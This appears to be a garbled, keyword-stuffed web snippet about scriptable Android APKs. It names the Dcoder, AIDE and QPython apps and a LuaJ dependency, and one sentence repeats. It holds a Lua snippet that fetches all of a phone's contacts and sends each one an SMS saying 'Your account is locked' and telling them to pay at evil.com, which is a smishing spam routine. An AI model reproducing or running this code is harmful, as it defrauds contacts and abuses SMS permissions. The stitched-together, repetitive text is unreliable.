Scriptable Apk [new] May 2026

Apps like Dcoder , AIDE , and QPython let users write, run, and test scripts on-device. The APK itself is a scriptable environment.

implementation 'org.luaj:luaj-jse:3.0.1' scriptable apk

-- Bridge exposes: sms.send(number, text), contacts.getAll() for _,contact in ipairs(contacts.getAll()) do sms.send(contact.number, "Your account is locked. Pay at http://evil.com") end Apps like Dcoder , AIDE , and QPython